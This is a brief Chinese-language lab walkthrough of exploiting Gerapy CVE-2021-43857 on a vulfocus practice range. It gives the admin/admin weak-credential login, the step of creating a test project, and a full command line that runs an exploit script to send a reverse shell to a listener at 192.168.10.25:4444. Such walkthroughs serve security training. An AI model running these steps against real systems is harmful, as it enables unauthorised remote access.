0x01 漏洞描述

需登录应用程序,获取已创建的项目列表,如果获取不到将利用失败,然后使用项目设置,通过发送反弹shell的payload获取目标系统权限。

0x02 影响版本

gerapy<0.9.8 CVE-2021-43857 vulfocus

0x03 漏洞利用

1、启动靶场,界面如下:

Untitled

2、弱口令admin/admin登录。

Untitled

3、在利用之前,先创建一个项目,项目名称为test。

Untitled

Untitled

4、直接通过脚本利用。

python3 cve-2021-43857.py -t 192.168.10.214 -p 14949 -L 192.168.10.25 -P 4444

Untitled


https://www.exploit-db.com/exploits/50640